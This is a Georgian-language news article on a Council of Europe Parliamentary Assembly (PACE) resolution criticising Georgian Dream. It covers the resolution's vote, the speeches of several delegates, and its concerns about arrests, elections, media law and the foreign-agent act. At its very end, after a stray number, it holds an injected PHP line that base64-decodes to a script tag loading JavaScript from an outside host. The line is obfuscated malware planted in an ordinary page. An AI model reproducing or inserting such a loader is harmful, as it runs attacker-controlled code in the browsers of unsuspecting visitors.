gorgia
ავერსი jaluzi

ევროპის საბჭოს საპარლამენტო ასამბლეამ (PACE), 89 ხმით 3-ის წინააღმდეგ, საქართველოზე რეზოლუცია მიიღო.

ასამბლეაში საქართველოზე დებატები დღეს გაიმართა, სხდომას საქართველოს წარმომადგენლები არ ესწრებოდნენ. რეზოლუციის ავტორებმა ALDE-ს წარმომადგენელმა საბინა ჩუდიჩმა და პორტუგალიელმა პარლამენტარმა ედიტ ესტრელამ თავის გამოსვლებში აღნიშნეს, რომ იანვრის დებატების შემდეგ საქართველოში სიტუაცია გაუარესდა და ასამბლეის რეკომენდაციებზე პროგრესის ნაცვლად დემოკრატიული უკუსვლა გაგრძელდა.

მათ ყურადღება ქვეყანაში ადამიანის უფლებების დარღვევებზე, სამოქალაქო საზოგადოების სივრცის შემცირებაზე, „ოცნების“ მიერ მიღებულ საკანონმდებლო ცვლილებებზე გაამახვილეს, შეშფოთება გამოხატეს მათ შორის დამოუკიდებელი მედიის და ოპოზიციის მიმართ არსებულ პოლიტიკაზე.

„სიტუაცია ყველა ფრონტზე გაუარესდა. არანაირი ნაბიჯები არ გადადგმულა ასამბლეის მოწოდების განსახორციელებლად, რომ დაუყოვნებლივ დაწყებულიყო ინკლუზიური პროცესი, ყველა დაინტერესებული მხარის ჩართვით საარჩევნო გარემოს შესაქმნელად ახალი, ნამდვილად დემოკრატიული არჩევნებისთვის“,- თქვა ედიტ ესტრელამ.

თავის მხრივ, გერმანელმა დეპუტატმა ფრანკ შვაბემ (SOC) სინანული გამოთქვა "ქართული ოცნების" შეცვლილი კურსის გამო. ის მიიჩნევს, რომ ახალი არჩევნებია საჭირო, უნდა განთავისუფლდნენ დაკავებულები და შეწყდეს რეპრესიები.

"ზოგიერთმა ქართველმა პოლიტიკოსმა მითხრა, შენ გსურს გადაწყვიტო რომელი გზით უნდა წავიდეთ ჩვენ, რა თქმა უნდა, არ მომწონს თუ ხარ ომის დამნაშავეების მეგობარი. თუმცა თუ გსურთ, იყოთ პუტინის რუსეთის მეგობარი, ამის გაკეთება შეგიძლიათ, მაგრამ რისი გაკეთებაც არ შეგიძლია ისაა, რომ ძირი გამოუთხარო ამ ორგანიზაციის ღირებულებებს და წესებს, უნდა დაიცვა ისინი. და თუ შეცვლი შენს ქვეყანას იმგვარ მოდელში, როგორიც პუტინის რუსეთია, შემდეგ ჩვენ გვაქვს პრობლემა. ამის გამო ჩვენ ძალიან ნათელი გზავნილი გავაკეთეთ, გთხოვთ, დაბრუნდით უკან, კონსტრუქციულ დიალოგში და წავიდეთ სწორი მიმართულებით ერთად. თუმცა სამწუხაროდ, დღეს უნდა ვთქვათ, რომ საპირისპირო ხდება",- აღნიშნა ფრანკ შვაბემ.

ნორვეგიელმა დეპუტატმა ინგერდ შოუმ (EPP/CD) აღნიშნა, რომ საქართველოს დელეგაციისგან მუშაობის შეწყვეტა არ იყო სიურპრიზი, თუმცა იმედგამაცრუებელი იყო,. მან ახალი არჩევნების საჭიროებაზე გაამახვილა ყურადღება.

“ევროპის საბჭოს სურს, რომ საქართველო დემოკრატიულ გზაზე დარჩეს, როგორც ბოლო მოვლენებამდე იყო. ჩვენ გავაკეთებთ მაქსიმუმს, რომ მხარი დავუჭიროთ დემოკრატიულ ძალებს საქართველოში. არც ერთი მოთხოვნა, რომელიც იანვარში განვსაზღვრეთ, არ შესრულებულა. საპირისპიროდ, ვითარება უარესია. მე განსაკუთრებით იმედგაცრუებული ვარ, რომ პოლიტიკური პატიმრები არ განთავისუფლებულან.

მე კვლავ მჯერა დიალოგის, თუმცა დიალოგი ორმხრივი გზაა. მოვუწოდებ საქართველოს მმართველ პარტიას ჩაერთოს ევროპულ საბჭოსთან დიალოგში. იყო წევრი და არ იღებდე მონაწილეობას, მიუღებელია. მე ასევე მოვუწოდებ მთავრობას და დემოკრატიულ ოპოზიციას დიალოგისკენ",- აღნიშნა დეპუტატმა.

ბრიტანეთის პარლამენტის წევრმა ჯეიმს მაკლერმა (ALDE) ბიძინა ივანიშვილის და მისი გარემოცვის, მათ შორის "იმედის" მფლობელის, ბიზნესმენ ირაკლი რუხაძის სანქცირებაზე გაამახვილა ყურადღება.

„თუ სერიოზულად გვსურს დემოკრატიის დაცვა, მოდით დავიწყოთ ცხადი ნაბიჯით, ივაიშვილის და მასთან დაკავშირებული ისეთი პირების სანქცირებით, როგორიცაა რუხაძე.

ქართველი ხალხი იმსახურებს ჩვენს სოლიდარობას, მხარდაჭერას და ქმედებებს. მოდით დავდგეთ მათ გვერდით ახლა, როდესაც ეს ყველაზე მეტად მნიშვნელოვანია",- თქვა ჯეიმს მაკლერმა.

დღევანდელ სხდომაზე მიღებულ კრიტიკულ რეზოლუციაში არაერთი საკითხი შედის, მათ შორის „ქართული ოცნების“ მიერ ბოლო დროს მიღებული რეპრესიული კანონები. უფრო დეტალურად:

ევროპის საბჭოს საპარლამენტო ასამბლეა წუხილს გამოთქვამს, რომ ქართულმა დელეგაციამ PACE-ში მუშაობა შეწყვიტა და დიალოგზე უარი თქვა. რეზოლუციაში ხელისუფლებას მოუწოდებენ დაიწყოს მოლაპარაკების პროცესი, სადაც ჩართულები იქნება ყველა მხარე, მათ შორის ოპოზიცია, სამოქალაქო საზოგადოება იმისთვის, რომ სასწრაფოდ აღმოიფხვრას წინა საპარლამენტო არჩევნების დროს გამოვლენილი ხარვეზები და შეიქმნას პირობები დემოკრატიული, თავისუფალი და სამართლიანი არჩევნების ჩასატარებლად. ამისთვის PACE გასცემს რეკომენდაციას, გაუქმდეს საარჩევნო კოდექსში შეტანილი ბოლო ცვლილებები.

რეზოლუციის პროექტში შეშფოთებაა გამოთქმული ბოლო პერიოდში შეცვლილ კანონმდებლობაზე, რომლითაც ცესკოს წევრების არჩევის წესი შეიცვალა, ხოლო კანონიდან ამოიღეს მოთხოვნა ამ პროცესში სამოქალაქო საზოგადოების წარმომადგენლები ყოფილიყვნენ ჩართულები. რეზოლუციაში წერია, რომ ეს საარჩევნო ადმინისტრაციის დამოუკიდებლობას კიდევ უფრო უთხრის ძირს.

ამას გარდა, რეზოლუციის პროექტში შეშფოთებაა გამოთქმული აქციის მონაწილეების, ჟურნალისტებისა და სამოქალაქო საზოგადოების ლიდერების დაკავებებზე. ასევე საუბარია სოლიდარობის მიზნით შექმნილი ფონდების დაყადაღებასა და მათ წინააღმდეგ გამოძიების დაწყებაზე. ამ რელოზოლუციითაც მოწოდებულია ყველა დაკავებულის გათავისუფლება. ასევე შეშფოთებაა გამოთქმული ცნობებზე იმის შესახებ, რომ დემონსტრაციების დროს დაკავებულები წამებისა და არაადამიანური მოპყრობის მსხვერპლნი გახდნენ. PACE ხელისუფლებას მოუწოდებს ყველა ასეთი საკითხი ეფექტიანად იქნეს გამოძიებული. რეზოლუციის პროექტში მოხვდა ოპოზიციის ერთ-ერთი ლიდერის ელენე ხოშტარიაც დაკავებაც და დაგმობილია მის მიმართ წინასწარი დაკავების იზოლატორში ჩადენილი ქმედებები.

PACE „ქართულ ოცნებას“ აკრიტიკებს ბოლო პერიოდში მიღებული რეპრესიული კანონების გამო და მათ გაუქმებას მოითხოვს, მათ შორის არის ადმინისტრაციულ სამართალდარღვევათა კოდექსში შეკრებისა და გამოხატვის თავისუფლების წინააღმდეგ მიმართული ცვლილებები.

რეზოლუციის თანახმად, საქართველოში მედიის მდგომარეობაც უარესდება. განსაკუთრებით გამახვილებულია ყურადღება კანონზე, რომელიც მედიებს უკრძალავს როგორც პირდაპირი, ისე ირიბი დაფინანსების მიღებას უცხოეთიდან. აქვეა აღნიშნული, რომ ცვლილებები მნიშვნელოვნად გაზრდის კომუნიკაციების კომისიის ბერკეტებს, ჩაერიოს მედიების შინაარსობრივ საქმიანობაში. რეზოლუციის პროექტში წერია, რომ თავად კომისიის დამოუკიდებლობისა და მიუკერძოებლობის საკითხი კითხვის ნიშნის ქვეშ დგას.

რეზოლუციის პროექტში უარყოფითადაა შეფასებული საჯარო სამსახურის შესახებ კანონში შეტანილი ცვლილებები და აღნიშნულია, რომ ახალი საკანონმდებლო ბაზა დაუცველს ტოვებს სახელმწიფო მოხელეებს. რეზოლუციაში შეშფოთებაა გამოთქმული ხელისუფლებისადმი კრიტიკულად განწყობილი საჯარო მოხელეების სამსახურიდან გაშვების გამო. PACE შეშფოთებას გამოთქვამს უცხოელი აგენტების რეგისტრაციის აქტის მიღების გამოც. ასამბლეის შეფასებით, ამ კანონს იგივე მიზნები აქვს, რაც რუსულ კანონს ჰქონდა, მაგრამ ამ შემთხვევაში გამკაცრებულია მიდგომა და დაუმორჩილებლობა სისხლისსამართლებრივ პასუხისმგებლობას იწვევს.

ასამბლეა განსაკუთრებით შეშფოთებულია მმართველი პარტიის განცხადებით აკრძალოს "კოლექტიური ნაციონალური მოძრაობა". დოკუმენტში ვკითხულობთ, რომ ოპოზიციური პარტიების აკრძალვა იქნება ევროპის საბჭოს დებულებებით ნაკისრი ვალდებულებების უხეში დარღვევა.

რეზოლუცია მოუწოდებს “ქართული ოცნების” პასუხისმგებელ პირებს, გაითვალისწინონ რეკომენდაციები იმისთვის, რომ ქვეყანაში კრიზისი იქნეს დაძლეული.

ცნობისთვის, ზამთრის სესიის შემდეგ საქართველოს დელეგაციას PACE-ში შეზღუდული უფლებამოსილება აქვს. ასამბლეის მიერ წამოყენებული პირობების საპასუხოდ „ქართულმა ოცნებამ“ მუშაობა შეაჩერა და საქართველოს პარლამენტის მუდმივმოქმედი დელეგაციის შემადგენლობიდან წევრები გამოიწვია. პარლამენტის საგარეო ურთიერთობათა კომიტეტის თავმჯდომარემ ნიკოლოზ სამხარაძემ კი განაცხადა, რომ „წევრების გამოწვევის მიუხედავად, დელეგაცია არ უქმდება, დელეგაცია რჩება“.

„ქართული ოცნების“ მიერ ევროპის საბჭოს საპარლამენტო ასამბლეაში (PACE) მუშაობის შეწყვეტაზე ინფორმაცია 29 იანვარს გახდა ცნობილი. ამის შესახებ „ქართული ოცნების“ საპარლამენტო დელეგაციის ხელმძღვანელმა, თეა წულუკიანმა სტრასბურგში მას შემდეგ განაცხადა, რაც PACE-მ საქართველოსთან დაკავშირებული, “ოცნების“ მიმართ კრიტიკული რეზოლუცია მიიღო და საქართველოს დელეგაციის უფლებამოსილება შეზღუდულად ცნო.

საქმე ისაა, რომ 2025 წლის ზამთრის პლენარული სესიის გახსნის დღეს საქართველოს დელეგაციის უფლებამოსილება გასაჩივრდა. საბოლოოდ, PACE-მ გადაწყვიტა, რომ „ქართული ოცნების” დელეგაციას მომდევნო სესიამდე შეზღუდული უფლებამოსილება ექნებოდა, სრულად რატიფიცირებისთვის კი კონკრეტული წინაპირობები უნდა შესრულებულიყო დემოკრატიულ გზაზე დასაბრუნებლად. 114 ხმით 13-ის წინააღმდეგ მიღებული რეზოლუციით, საპარლამენტო ასამბლეა მოითხოვდა "ქართულ ოცნებას" მიმდინარე წლის აპრილამდე ხელახალი საპარლამენტო არჩევნები დაენიშნა და პოლიტპატიმრები გაეთავისუფლებინა. ამასთან, PACE საქართველოს ოფიციალური პირებისგან მოითხოვდა დაუყოვნებლივ და ეფექტიან ნაბიჯებს საქართველოს ევროპული ინტეგრაციის გზის განსაახლებლად.

613
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");